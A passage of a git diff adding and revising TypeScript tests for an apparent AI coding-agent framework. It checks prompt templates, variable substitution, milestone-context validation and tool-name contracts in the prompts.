+    );
+    assert.ok(
+      discussPrepared.includes("{{priorContextBrief}}"),
+      "discuss-prepared.md should contain {{priorContextBrief}} placeholder",
+    );
+    assert.ok(
+      discussPrepared.includes("{{ecosystemBrief}}"),
+      "discuss-prepared.md should contain {{ecosystemBrief}} placeholder",
+    );
+  });
+
+  test("contains 4-layer protocol markers", () => {
+    const discussPrepared = readFileSync(discussPreparedPath, "utf-8");
+
+    // Check for all four layer headings
+    assert.ok(
+      discussPrepared.includes("## Layer 1 — Scope"),
+      "discuss-prepared.md should contain Layer 1 (Scope)",
+    );
+    assert.ok(
+      discussPrepared.includes("## Layer 2 — Architecture"),
+      "discuss-prepared.md should contain Layer 2 (Architecture)",
+    );
+    assert.ok(
+      discussPrepared.includes("## Layer 3 — Error States"),
+      "discuss-prepared.md should contain Layer 3 (Error States)",
+    );
+    assert.ok(
+      discussPrepared.includes("## Layer 4 — Quality Bar"),
+      "discuss-prepared.md should contain Layer 4 (Quality Bar)",
+    );
+  });
+
+  test("contains gate question IDs for all layers", () => {
+    const discussPrepared = readFileSync(discussPreparedPath, "utf-8");
+
+    assert.ok(
+      discussPrepared.includes("layer1_scope_gate"),
+      "discuss-prepared.md should contain layer1_scope_gate question ID",
+    );
+    assert.ok(
+      discussPrepared.includes("layer2_architecture_gate"),
+      "discuss-prepared.md should contain layer2_architecture_gate question ID",
+    );
+    assert.ok(
+      discussPrepared.includes("layer3_error_gate"),
+      "discuss-prepared.md should contain layer3_error_gate question ID",
+    );
+    assert.ok(
+      discussPrepared.includes("layer4_quality_gate"),
+      "discuss-prepared.md should contain layer4_quality_gate question ID",
+    );
+  });
+
+  test("contains context-enhanced template guidance", () => {
+    const discussPrepared = readFileSync(discussPreparedPath, "utf-8");
+
+    assert.ok(
+      discussPrepared.includes("context-enhanced"),
+      "discuss-prepared.md should reference context-enhanced template",
+    );
+  });
+});
+
+// ─── Prompt Loading Tests ───────────────────────────────────────────────────────
+
+describe("Prompt Loading", () => {
+  // Dynamic import to work with the module's warm cache
+  test("loadPrompt substitutes all variables correctly", async () => {
+    const { loadPrompt } = await import("../prompt-loader.ts");
+
+    const result = loadPrompt("discuss-prepared", {
+      preamble: "Test preamble",
+      codebaseBrief: "Test codebase brief content",
+      priorContextBrief: "Test prior context brief content",
+      ecosystemBrief: "Test ecosystem brief content",
+      milestoneId: "M001",
+      contextPath: ".gsd/milestones/M001/M001-CONTEXT.md",
+      roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
+      inlinedTemplates: "Test templates",
+      commitInstruction: "Test commit instruction",
+      multiMilestoneCommitInstruction: "Test multi-milestone commit",
+    });
+
+    assert.ok(result.includes("Test codebase brief content"), "codebaseBrief should be substituted");
+    assert.ok(result.includes("Test prior context brief content"), "priorContextBrief should be substituted");
+    assert.ok(result.includes("Test ecosystem brief content"), "ecosystemBrief should be substituted");
+    assert.ok(!result.includes("{{codebaseBrief}}"), "placeholder should not remain");
+  });
+
+  test("loadPrompt throws GSDError for missing variables", async () => {
+    const { loadPrompt } = await import("../prompt-loader.ts");
+    const { GSDError, GSD_PARSE_ERROR } = await import("../errors.ts");
+
+    assert.throws(
+      () => loadPrompt("discuss-prepared", {}), // Missing required variables
+      (err: unknown) => {
+        assert.ok(err instanceof GSDError, "should throw GSDError");
+        assert.equal((err as InstanceType<typeof GSDError>).code, GSD_PARSE_ERROR, "should have GSD_PARSE_ERROR code");
+        return true;
+      },
+    );
+  });
+
+  test("brief content with {{...}} patterns does not cause false variable errors", async () => {
+    const { loadPrompt } = await import("../prompt-loader.ts");
+
+    // Content that contains template-like patterns but should not be treated as variables
+    const briefWithPatterns = `
+## Tech Stack
+- Framework: Uses \`{{slot}}\` placeholder syntax in templates
+- Pattern: The codebase has \`{{variableName}}\` markers
+`;
+
+    // This should NOT throw, because {{slot}} and {{variableName}} are inside
+    // the brief value, not undeclared placeholders in the template itself.
+    const result = loadPrompt("discuss-prepared", {
+      preamble: "Test",
+      codebaseBrief: briefWithPatterns,
+      priorContextBrief: "Test brief",
+      ecosystemBrief: "Test brief",
+      milestoneId: "M001",
+      contextPath: ".gsd/milestones/M001/M001-CONTEXT.md",
+      roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
+      inlinedTemplates: "Test templates",
+      commitInstruction: "Test commit instruction",
+      multiMilestoneCommitInstruction: "Test multi-milestone commit",
+    });
+
+    assert.ok(result.includes("{{slot}}"), "template-like patterns in content should be preserved");
+    assert.ok(result.includes("{{variableName}}"), "template-like patterns in content should be preserved");
+  });
+});
+
+// ─── Validation Tests ───────────────────────────────────────────────────────────
+
+describe("Enhanced Context Validation", () => {
+  test("valid enhanced context passes validation", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const validContent = `
+# M001: Test Milestone
+
+## Why This Milestone
+
+This is why we need this milestone.
+
+## Architectural Decisions
+
+### Decision 1
+
+**Decision:** Use TypeScript
+**Rationale:** Type safety
+
+## Acceptance Criteria
+
+- Criterion 1
+- Criterion 2
+`;
+
+    const result = validateEnhancedContext(validContent);
+    assert.equal(result.valid, true, "valid content should pass validation");
+    assert.equal(result.missing.length, 0, "no missing sections");
+  });
+
+  test("missing scope section fails", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const contentMissingScope = `
+# M001: Test Milestone
+
+## Architectural Decisions
+
+### Decision 1
+
+**Decision:** Use TypeScript
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentMissingScope);
+    assert.equal(result.valid, false, "should fail validation");
+    assert.ok(
+      result.missing.some((m) => m.includes("Scope") || m.includes("Why This Milestone")),
+      "should report missing scope section",
+    );
+  });
+
+  test("missing architectural decisions section fails", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const contentMissingDecisions = `
+# M001: Test Milestone
+
+## Why This Milestone
+
+This is why we need this milestone.
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentMissingDecisions);
+    assert.equal(result.valid, false, "should fail validation");
+    assert.ok(
+      result.missing.includes("Architectural Decisions"),
+      "should report missing architectural decisions section",
+    );
+  });
+
+  test("missing acceptance criteria section fails", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const contentMissingCriteria = `
+# M001: Test Milestone
+
+## Why This Milestone
+
+This is why we need this milestone.
+
+## Architectural Decisions
+
+### Decision 1
+
+**Decision:** Use TypeScript
+`;
+
+    const result = validateEnhancedContext(contentMissingCriteria);
+    assert.equal(result.valid, false, "should fail validation");
+    assert.ok(
+      result.missing.includes("Acceptance Criteria"),
+      "should report missing acceptance criteria section",
+    );
+  });
+
+  test("empty architectural decisions section (no entries) fails", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const contentEmptyDecisions = `
+# M001: Test Milestone
+
+## Why This Milestone
+
+This is why we need this milestone.
+
+## Architectural Decisions
+
+No decisions yet.
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+
+    const result = validateEnhancedContext(contentEmptyDecisions);
+    assert.equal(result.valid, false, "should fail validation");
+    assert.ok(
+      result.missing.some((m) => m.includes("decision entry")),
+      "should report missing decision entry",
+    );
+  });
+
+  test("alternative scope headers are accepted", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    // Test with ## Scope
+    const withScope = `
+## Scope
+
+### In Scope
+- Item 1
+
+## Architectural Decisions
+
+### Decision 1
+**Decision:** Test
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+    assert.equal(validateEnhancedContext(withScope).valid, true, "## Scope should be accepted");
+
+    // Test with ## Milestone Scope
+    const withMilestoneScope = `
+## Milestone Scope
+
+This is the scope.
+
+## Architectural Decisions
+
+### Decision 1
+**Decision:** Test
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+    assert.equal(
+      validateEnhancedContext(withMilestoneScope).valid,
+      true,
+      "## Milestone Scope should be accepted",
+    );
+  });
+
+  test("alternative acceptance criteria headers are accepted", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const withFinalIntegrated = `
+## Why This Milestone
+
+Test
+
+## Architectural Decisions
+
+### Decision 1
+**Decision:** Test
+
+## Final Integrated Acceptance
+
+- Criterion 1
+`;
+    assert.equal(
+      validateEnhancedContext(withFinalIntegrated).valid,
+      true,
+      "## Final Integrated Acceptance should be accepted",
+    );
+  });
+
+  test("inline decision format is accepted", async () => {
+    const { validateEnhancedContext } = await import("../prompt-validation.ts");
+
+    const withInlineDecision = `
+## Why This Milestone
+
+Test
+
+## Architectural Decisions
+
+**Decision:** Use React for the frontend
+
+## Acceptance Criteria
+
+- Criterion 1
+`;
+    assert.equal(
+      validateEnhancedContext(withInlineDecision).valid,
+      true,
+      "**Decision marker format should be accepted",
+    );
+  });
+});
+
+// ─── Integration Tests ──────────────────────────────────────────────────────────
+
+describe("Integration: Format Functions", () => {
+  test("formatCodebaseBrief produces non-empty output", async () => {
+    const { formatCodebaseBrief } = await import("../preparation.ts");
+
+    const brief = {
+      techStack: {
+        primaryLanguage: "TypeScript",
+        detectedFiles: ["package.json", "tsconfig.json"],
+        packageManager: "npm",
+        isMonorepo: false,
+        hasTests: true,
+        hasCI: true,
+      },
+      moduleStructure: {
+        topLevelDirs: ["src", "tests"],
+        srcSubdirs: ["components", "utils"],
+        totalFilesSampled: 5,
+      },
+      patterns: {
+        asyncStyle: "async/await" as const,
+        errorHandling: "try/catch" as const,
+        namingConvention: "camelCase" as const,
+        evidence: {
+          asyncStyle: ["src/foo.ts: async/await (5 occurrences)"],
+          errorHandling: ["src/bar.ts: try/catch (3 occurrences)"],
+          namingConvention: ["camelCase: 50 occurrences"],
+        },
+        fileCounts: {
+          asyncAwait: 3,
+          promises: 0,
+          callbacks: 0,
+          tryCatch: 2,
+          errorCallbacks: 0,
+          resultTypes: 0,
+        },
+      },
+      sampledFiles: ["src/index.ts", "src/utils.ts"],
+    };
+
+    const formatted = formatCodebaseBrief(brief);
+    assert.ok(formatted.length > 0, "formatted brief should not be empty");
+    assert.ok(formatted.includes("TypeScript"), "should include primary language");
+    assert.ok(formatted.includes("async/await"), "should include async style");
+  });
+
+  test("formatPriorContextBrief produces non-empty output", async () => {
+    const { formatPriorContextBrief } = await import("../preparation.ts");
+
+    const brief = {
+      decisions: {
+        byScope: new Map([
+          ["architecture", [{ id: "D001", scope: "architecture", decision: "Use SQLite", choice: "SQLite", rationale: "Simplicity" }]],
+        ]),
+        totalCount: 1,
+      },
+      requirements: {
+        active: [{ id: "R001", description: "Test requirement", status: "active" as const }],
+        validated: [],
+        deferred: [],
+        totalCount: 1,
+      },
+      knowledge: "Some knowledge entry",
+      summaries: "M001 completed X and Y",
+    };
+
+    const formatted = formatPriorContextBrief(brief);
+    assert.ok(formatted.length > 0, "formatted brief should not be empty");
+    assert.ok(formatted.includes("Prior Decisions"), "should include decisions section");
+    assert.ok(formatted.includes("D001"), "should include decision ID");
+  });
+
+  test("formatEcosystemBrief returns simplified message (research happens during discussion)", async () => {
+    const { formatEcosystemBrief } = await import("../preparation.ts");
+
+    // formatEcosystemBrief now returns a fixed message regardless of brief content
+    // because ecosystem research happens during the discussion, not preparation
+    const briefWithFindings = {
+      available: true,
+      queries: ["Next.js best practices 2024"],
+      findings: [
+        {
+          query: "Next.js best practices 2024",
+          title: "Server Components Guide",
+          url: "https://example.com/guide",
+          snippet: "Use Server Components for data fetching",
+        },
+      ],
+      provider: "tavily",
+    };
+
+    const formatted = formatEcosystemBrief(briefWithFindings);
+    assert.ok(formatted.length > 0, "formatted brief should not be empty");
+    assert.ok(formatted.includes("Ecosystem Research"), "should include research heading");
+    assert.ok(formatted.includes("during the discussion"), "should mention research happens during discussion");
+  });
+
+  test("formatEcosystemBrief returns same output for any brief state", async () => {
+    const { formatEcosystemBrief } = await import("../preparation.ts");
+
+    const briefUnavailable = {
+      available: false,
+      queries: [],
+      findings: [],
+      skippedReason: "No API key configured",
+    };
+
+    const briefAvailable = {
+      available: true,
+      queries: ["test"],
+      findings: [],
+      provider: "tavily",
+    };
+
+    const formatted1 = formatEcosystemBrief(briefUnavailable);
+    const formatted2 = formatEcosystemBrief(briefAvailable);
+    
+    // Both should return the same simplified message
+    assert.equal(formatted1, formatted2, "should return consistent output regardless of brief state");
+    assert.ok(formatted1.includes("web search tools"), "should mention web search tools");
+  });
+
+  test("formatted briefs can be injected into prompt without errors", async () => {
+    const { loadPrompt } = await import("../prompt-loader.ts");
+    const { formatCodebaseBrief, formatPriorContextBrief, formatEcosystemBrief } = await import("../preparation.ts");
+
+    // Create realistic briefs
+    const codebaseBrief = formatCodebaseBrief({
+      techStack: {
+        primaryLanguage: "TypeScript",
+        detectedFiles: ["package.json"],
+        packageManager: "npm",
+        isMonorepo: false,
+        hasTests: true,
+        hasCI: false,
+      },
+      moduleStructure: {
+        topLevelDirs: ["src"],
+        srcSubdirs: [],
+        totalFilesSampled: 1,
+      },
+      patterns: {
+        asyncStyle: "async/await" as const,
+        errorHandling: "try/catch" as const,
+        namingConvention: "camelCase" as const,
+        evidence: { asyncStyle: [], errorHandling: [], namingConvention: [] },
+        fileCounts: {
+          asyncAwait: 0,
+          promises: 0,
+          callbacks: 0,
+          tryCatch: 0,
+          errorCallbacks: 0,
+          resultTypes: 0,
+        },
+      },
+      sampledFiles: [],
+    });
+
+    const priorContextBrief = formatPriorContextBrief({
+      decisions: { byScope: new Map(), totalCount: 0 },
+      requirements: { active: [], validated: [], deferred: [], totalCount: 0 },
+      knowledge: "No prior knowledge recorded.",
+      summaries: "No prior milestone summaries.",
+    });
+
+    const ecosystemBrief = formatEcosystemBrief({
+      available: false,
+      queries: [],
+      findings: [],
+      skippedReason: "Preparation disabled",
+    });
+
+    // Should not throw when injecting formatted briefs
+    const result = loadPrompt("discuss-prepared", {
+      preamble: "Test preamble",
+      codebaseBrief,
+      priorContextBrief,
+      ecosystemBrief,
+      milestoneId: "M001",
+      contextPath: ".gsd/milestones/M001/M001-CONTEXT.md",
+      roadmapPath: ".gsd/milestones/M001/M001-ROADMAP.md",
+      inlinedTemplates: "Test templates",
+      commitInstruction: "Do not commit",
+      multiMilestoneCommitInstruction: "Do not commit",
+    });
+
+    assert.ok(result.includes("TypeScript"), "codebase brief should be present");
+    assert.ok(result.includes("Prior Decisions"), "prior context brief should be present");
+    // formatEcosystemBrief now returns a fixed message about research during discussion
+    assert.ok(result.includes("during the discussion"), "ecosystem brief should be present");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/prompt-contracts.test.ts b/src/resources/extensions/gsd/tests/prompt-contracts.test.ts
index 0ae532979..1b19d356c 100644
--- a/src/resources/extensions/gsd/tests/prompt-contracts.test.ts
+++ b/src/resources/extensions/gsd/tests/prompt-contracts.test.ts
@@ -35,6 +35,13 @@ test("workflow-start prompt defaults to autonomy instead of per-phase confirmati
   assert.doesNotMatch(prompt, /Gate between phases/i);
 });
 
+test("system prompt references CODEBASE.md and /gsd codebase", () => {
+  const prompt = readPrompt("system");
+  assert.match(prompt, /CODEBASE\.md/);
+  assert.match(prompt, /\/gsd codebase \[generate\|update\|stats\]/);
+  assert.match(prompt, /auto-refreshes it when tracked files change/i);
+});
+
 test("discuss prompt allows implementation questions when they materially matter", () => {
   const prompt = readPrompt("discuss");
   assert.match(prompt, /Lead with experience, but ask implementation when it materially matters/i);
@@ -51,9 +58,239 @@ test("guided discussion prompts avoid wrap-up prompts after every round", () =>
   assert.doesNotMatch(slicePrompt, /I think I have a solid picture of this slice\. Ready to wrap up/i);
 });
 
+test("guided milestone discussion scopes depth verification to the milestone id", () => {
+  const prompt = readPrompt("guided-discuss-milestone");
+  assert.match(prompt, /depth_verification_\{\{milestoneId\}\}/, "depth verification id should include the milestone id");
+  assert.doesNotMatch(prompt, /depth_verification_confirm" — this enables the write-gate downstream/i, "legacy global depth gate wording should be gone");
+});
+
 test("guided-resume-task prompt preserves recovery state until work is superseded", () => {
   const prompt = readPrompt("guided-resume-task");
   assert.match(prompt, /Do \*\*not\*\* delete the continue file immediately/i);
   assert.match(prompt, /successfully completed or you have written a newer summary\/continue artifact/i);
   assert.doesNotMatch(prompt, /Delete the continue file after reading it/i);
 });
+
+// ─── Prompt migration: execute-task → gsd_complete_task ───────────────
+
+test("execute-task prompt references gsd_complete_task tool", () => {
+  const prompt = readPrompt("execute-task");
+  assert.match(prompt, /gsd_complete_task/);
+});
+
+test("execute-task prompt uses gsd_complete_task as canonical summary write path", () => {
+  const prompt = readPrompt("execute-task");
+  assert.match(prompt, /\{\{taskSummaryPath\}\}/);
+  assert.match(prompt, /gsd_complete_task/);
+  assert.match(prompt, /DB-backed tool is the canonical write path/i);
+  assert.match(prompt, /Do \*\*not\*\* manually write `?\{\{taskSummaryPath\}\}`?/i);
+  assert.doesNotMatch(prompt, /^\d+\.\s+Write `?\{\{taskSummaryPath\}\}`?\s*$/m);
+});
+
+test("execute-task prompt does not instruct LLM to toggle checkboxes manually", () => {
+  const prompt = readPrompt("execute-task");
+  assert.doesNotMatch(prompt, /change \[ \] to \[x\]/);
+  assert.doesNotMatch(prompt, /Mark \{\{taskId\}\} done in/);
+});
+
+test("execute-task prompt still contains template variables for context", () => {
+  const prompt = readPrompt("execute-task");
+  assert.match(prompt, /\{\{taskSummaryPath\}\}/);
+  assert.match(prompt, /\{\{planPath\}\}/);
+});
+
+test("guided-execute-task prompt references gsd_task_complete tool", () => {
+  const prompt = readPrompt("guided-execute-task");
+  assert.match(prompt, /gsd_task_complete/);
+});
+
+test("guided-execute-task prompt does not instruct manual file write", () => {
+  const prompt = readPrompt("guided-execute-task");
+  assert.doesNotMatch(prompt, /Write `?\{\{taskId\}\}-SUMMARY\.md`?.*mark it done/i);
+});
+
+// ─── Prompt migration: complete-slice → gsd_complete_slice ────────────
+
+test("complete-slice prompt references gsd_complete_slice tool", () => {
+  const prompt = readPrompt("complete-slice");
+  assert.match(prompt, /gsd_complete_slice/);
+});
+
+test("complete-slice prompt does not instruct LLM to toggle checkboxes manually", () => {
+  const prompt = readPrompt("complete-slice");
+  assert.doesNotMatch(prompt, /change \[ \] to \[x\]/);
+});
+
+test("guided-complete-slice prompt references gsd_slice_complete tool", () => {
+  const prompt = readPrompt("guided-complete-slice");
+  assert.match(prompt, /gsd_slice_complete/);
+});
+
+test("complete-slice prompt instructs writing summary and UAT files before tool call", () => {
+  const prompt = readPrompt("complete-slice");
+  assert.match(prompt, /\{\{sliceSummaryPath\}\}/);
+  assert.match(prompt, /\{\{sliceUatPath\}\}/);
+  assert.match(prompt, /gsd_complete_slice/);
+  assert.match(prompt, /DB-backed tool is the canonical write path/i);
+  assert.match(prompt, /Do \*\*not\*\* manually write `?\{\{sliceSummaryPath\}\}`?/i);
+  assert.match(prompt, /Do \*\*not\*\* manually write `?\{\{sliceUatPath\}\}`?/i);
+  assert.doesNotMatch(prompt, /^\d+\.\s+Write `?\{\{sliceSummaryPath\}\}`?.*$/m);
+  assert.doesNotMatch(prompt, /^\d+\.\s+Write `?\{\{sliceUatPath\}\}`?.*$/m);
+});
+
+test("complete-slice prompt preserves decisions and knowledge review steps", () => {
+  const prompt = readPrompt("complete-slice");
+  assert.match(prompt, /DECISIONS\.md/);
+  assert.match(prompt, /KNOWLEDGE\.md/);
+});
+
+test("validate-milestone prompt uses gsd_validate_milestone as canonical validation write path", () => {
+  const prompt = readPrompt("validate-milestone");
+  assert.match(prompt, /gsd_validate_milestone/);
+  assert.match(prompt, /\{\{validationPath\}\}/);
+  assert.match(prompt, /DB-backed tool is the canonical write path/i);
+  assert.match(prompt, /Do \*\*not\*\* manually write `?\{\{validationPath\}\}`?/i);
+  assert.doesNotMatch(prompt, /Write to `?\{\{validationPath\}\}`?:/i);
+});
+
+test("complete-slice prompt still contains template variables for context", () => {
+  const prompt = readPrompt("complete-slice");
+  assert.match(prompt, /\{\{sliceSummaryPath\}\}/);
+  assert.match(prompt, /\{\{sliceUatPath\}\}/);
+});
+
+test("plan-milestone prompt references DB-backed planning tool and explicitly forbids manual roadmap writes", () => {
+  const prompt = readPrompt("plan-milestone");
+  assert.match(prompt, /gsd_plan_milestone/);
+  assert.match(prompt, /Do \*\*not\*\* write `?\{\{outputPath\}\}`?, `?ROADMAP\.md`?, or other planning artifacts manually/i);
+});
+
+test("guided-plan-milestone prompt references DB-backed planning tool and explicitly forbids manual roadmap writes", () => {
+  const prompt = readPrompt("guided-plan-milestone");
+  assert.match(prompt, /gsd_plan_milestone/);
+  assert.match(prompt, /Do \*\*not\*\* write `?\{\{milestoneId\}\}-ROADMAP\.md`?, `?ROADMAP\.md`?, or other planning artifacts manually/i);
+});
+
+test("plan-slice prompt no longer frames direct PLAN writes as the source of truth", () => {
+  const prompt = readPrompt("plan-slice");
+  assert.match(prompt, /Do \*\*not\*\* rely on direct `PLAN\.md` writes as the source of truth/i);
+});
+
+test("plan-slice prompt explicitly names gsd_plan_slice as DB-backed planning tool", () => {
+  const prompt = readPrompt("plan-slice");
+  assert.match(prompt, /gsd_plan_slice/);
+  assert.match(prompt, /gsd_plan_task/);
+  // The prompt should describe the DB-backed tool as the canonical write path
+  assert.match(prompt, /DB-backed tool is the canonical write path/i);
+});
+
+test("plan-slice prompt does not instruct direct file writes as a primary step", () => {
+  const prompt = readPrompt("plan-slice");
+  // Should not instruct to "Write {{outputPath}}" as a primary step — tools handle rendering
+  assert.doesNotMatch(prompt, /^\d+\.\s+Write `?\{\{outputPath\}\}`?\s*$/m);
+});
+
+test("plan-slice prompt clarifies gsd_plan_slice handles task persistence", () => {
+  const prompt = readPrompt("plan-slice");
+  // gsd_plan_slice persists tasks in its transaction — no separate gsd_plan_task calls needed
+  assert.match(prompt, /gsd_plan_task/);
+  assert.match(prompt, /gsd_plan_slice` handles task persistence/i);
+});
+
+test("replan-slice prompt uses gsd_replan_slice as canonical DB-backed tool", () => {
+  const prompt = readPrompt("replan-slice");
+  assert.match(prompt, /gsd_replan_slice/);
+  // Degraded fallback (direct file writes) was removed — DB tools are always available
+  assert.doesNotMatch(prompt, /Degraded fallback/i);
+});
+
+test("reassess-roadmap prompt references gsd_reassess_roadmap tool", () => {
+  const prompt = readPrompt("reassess-roadmap");
+  assert.match(prompt, /gsd_reassess_roadmap/);
+});
+
+test("validate-milestone prompt dispatches parallel reviewers", () => {
+  const prompt = readPrompt("validate-milestone");
+  assert.match(prompt, /Reviewer A/);
+  assert.match(prompt, /Reviewer B/);
+  assert.match(prompt, /Reviewer C/);
+  assert.match(prompt, /Requirements Coverage/);
+  assert.match(prompt, /Cross-Slice Integration/);
+  assert.match(prompt, /Assessment & Acceptance Criteria/);
+  assert.match(prompt, /assessment evidence/i);
+});
+
+// ─── Prompt migration: replan-slice → gsd_replan_slice ────────────────
+
+test("replan-slice prompt names gsd_replan_slice as the tool to use", () => {
+  const prompt = readPrompt("replan-slice");
+  assert.match(prompt, /gsd_replan_slice/);
+});
+
+// ─── Prompt migration: reassess-roadmap → gsd_reassess_roadmap ───────
+
+test("reassess-roadmap prompt names gsd_reassess_roadmap as the tool to use", () => {
+  const prompt = readPrompt("reassess-roadmap");
+  assert.match(prompt, /gsd_reassess_roadmap/);
+});
+
+// ─── Bug #2933: prompt parameter names must match camelCase TypeBox schema ───
+
+test("execute-task prompt uses camelCase parameter names matching TypeBox schema", () => {
+  const prompt = readPrompt("execute-task");
+  // The gsd_complete_task tool schema uses camelCase: milestoneId, sliceId, taskId
+  // Prompts must NOT tell the LLM to use snake_case (milestone_id, slice_id, task_id)
+  const toolCallLine = prompt.split("\n").find((l) => /gsd_complete_task/.test(l) || /gsd_task_complete/.test(l));
+  assert.ok(toolCallLine, "prompt must contain a gsd_complete_task or gsd_task_complete tool call line");
+  assert.doesNotMatch(toolCallLine!, /milestone_id/, "must use milestoneId, not milestone_id");
+  assert.doesNotMatch(toolCallLine!, /slice_id/, "must use sliceId, not slice_id");
+  assert.doesNotMatch(toolCallLine!, /task_id/, "must use taskId, not task_id");
+  // Positive: must mention the camelCase names
+  assert.match(toolCallLine!, /milestoneId/);
+  assert.match(toolCallLine!, /sliceId/);
+  assert.match(toolCallLine!, /taskId/);
+});
+
+test("complete-slice prompt uses camelCase parameter names matching TypeBox schema", () => {
+  const prompt = readPrompt("complete-slice");
+  // The gsd_complete_slice tool schema uses camelCase: milestoneId, sliceId
+  const toolCallLine = prompt.split("\n").find((l) => /gsd_complete_slice/.test(l) || /gsd_slice_complete/.test(l));
+  assert.ok(toolCallLine, "prompt must contain a gsd_complete_slice or gsd_slice_complete tool call line");
+  assert.doesNotMatch(toolCallLine!, /milestone_id/, "must use milestoneId, not milestone_id");
+  assert.doesNotMatch(toolCallLine!, /slice_id/, "must use sliceId, not slice_id");
+  // Positive: must mention the camelCase names
+  assert.match(toolCallLine!, /milestoneId/);
+  assert.match(toolCallLine!, /sliceId/);
+});
+
+// ─── File system safety: complete-slice parity with complete-milestone (#2935) ──
+
+test("complete-slice prompt includes filesystem safety guard against EISDIR", () => {
+  const prompt = readPrompt("complete-slice");
+  assert.match(
+    prompt,
+    /File system safety/i,
+    "complete-slice.md must include a 'File system safety' instruction to prevent EISDIR errors when the LLM passes a directory path to the read tool"
+  );
+  assert.match(
+    prompt,
+    /never pass.*directory path.*directly to the.*read.*tool/i,
+    "complete-slice.md must warn against passing directory paths to the read tool"
+  );
+});
+
+test("complete-milestone prompt still has its filesystem safety guard (regression)", () => {
+  const prompt = readPrompt("complete-milestone");
+  assert.match(
+    prompt,
+    /File system safety/i,
+    "complete-milestone.md must keep its filesystem safety guard"
+  );
+});
+
+test("reactive-execute prompt references tool calls instead of checkbox updates", () => {
+  const prompt = readPrompt("reactive-execute");
+  assert.doesNotMatch(prompt, /checkbox updates/);
+  assert.doesNotMatch(prompt, /checkbox edits/);
+  assert.match(prompt, /completion tool calls/);
+});
diff --git a/src/resources/extensions/gsd/tests/prompt-db.test.ts b/src/resources/extensions/gsd/tests/prompt-db.test.ts
index 5e934b6e0..35853a82d 100644
--- a/src/resources/extensions/gsd/tests/prompt-db.test.ts
+++ b/src/resources/extensions/gsd/tests/prompt-db.test.ts
@@ -5,7 +5,8 @@
 // (b) Helpers fall back to non-null output when DB unavailable
 // (c) Scoped filtering actually reduces content
 
-import { createTestContext } from './test-helpers.ts';
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import {
   openDatabase,
   closeDatabase,
@@ -22,8 +23,6 @@ import {
   formatRequirementsForPrompt,
 } from '../context-store.ts';
 
-const { assertEq, assertTrue, assertMatch, assertNoMatch, report } = createTestContext();
-
 // ═══════════════════════════════════════════════════════════════════════════
 // prompt-db: DB-aware decisions helper returns scoped content
 // ═══════════════════════════════════════════════════════════════════════════
@@ -50,23 +49,23 @@ console.log('\n=== prompt-db: scoped decisions from DB ===');
 
   // Query scoped to M001
   const m001Decisions = queryDecisions({ milestoneId: 'M001' });
-  assertTrue(m001Decisions.length > 0, 'M001 decisions should exist');
-  assertTrue(m001Decisions.length < 10, `scoped query should return fewer than 10 (got ${m001Decisions.length})`);
+  assert.ok(m001Decisions.length > 0, 'M001 decisions should exist');
+  assert.ok(m001Decisions.length < 10, `scoped query should return fewer than 10 (got ${m001Decisions.length})`);
 
   // Verify all returned decisions are for M001
   for (const d of m001Decisions) {
-    assertMatch(d.when_context, /M001/, `decision ${d.id} should be for M001`);
+    assert.match(d.when_context, /M001/, `decision ${d.id} should be for M001`);
   }
 
   // Format and verify wrapping
   const formatted = formatDecisionsForPrompt(m001Decisions);
-  assertTrue(formatted.length > 0, 'formatted decisions should be non-empty');
-  assertMatch(formatted, /\| # \| When \| Scope/, 'formatted decisions have table header');
+  assert.ok(formatted.length > 0, 'formatted decisions should be non-empty');
+  assert.match(formatted, /\| # \| When \| Scope/, 'formatted decisions have table header');
 
   // Verify the expected wrapper format that inlineDecisionsFromDb would produce
   const wrapped = `### Decisions\nSource: \`.gsd/DECISIONS.md\`\n\n${formatted}`;
-  assertMatch(wrapped, /^### Decisions/, 'wrapped decisions start with ### Decisions');
-  assertMatch(wrapped, /Source:.*DECISIONS\.md/, 'wrapped decisions have source path');
+  assert.match(wrapped, /^### Decisions/, 'wrapped decisions start with ### Decisions');
+  assert.match(wrapped, /Source:.*DECISIONS\.md/, 'wrapped decisions have source path');
 
   closeDatabase();
 }
@@ -101,25 +100,25 @@ console.log('\n=== prompt-db: scoped requirements from DB ===');
 
   // Query scoped to S01 — should get R001 (primary) and R002 (supporting)
   const s01Reqs = queryRequirements({ sliceId: 'S01' });
-  assertEq(s01Reqs.length, 2, 'S01 requirements should be 2 (primary + supporting)');
+  assert.deepStrictEqual(s01Reqs.length, 2, 'S01 requirements should be 2 (primary + supporting)');
   const ids = s01Reqs.map(r => r.id).sort();
-  assertEq(ids, ['R001', 'R002'], 'S01 owns R001 and supports R002');
+  assert.deepStrictEqual(ids, ['R001', 'R002'], 'S01 owns R001 and supports R002');
 
   // Unscoped query returns all 3
   const allReqs = queryRequirements();
-  assertEq(allReqs.length, 3, 'unscoped requirements should return all 3');
+  assert.deepStrictEqual(allReqs.length, 3, 'unscoped requirements should return all 3');
 
   // Format and verify wrapping
   const formatted = formatRequirementsForPrompt(s01Reqs);
-  assertTrue(formatted.length > 0, 'formatted requirements should be non-empty');
-  assertMatch(formatted, /### R001/, 'formatted requirements include R001');
-  assertMatch(formatted, /### R002/, 'formatted requirements include R002');
-  assertNoMatch(formatted, /### R003/, 'formatted requirements exclude R003');
+  assert.ok(formatted.length > 0, 'formatted requirements should be non-empty');
+  assert.match(formatted, /### R001/, 'formatted requirements include R001');
+  assert.match(formatted, /### R002/, 'formatted requirements include R002');
+  assert.doesNotMatch(formatted, /### R003/, 'formatted requirements exclude R003');
 
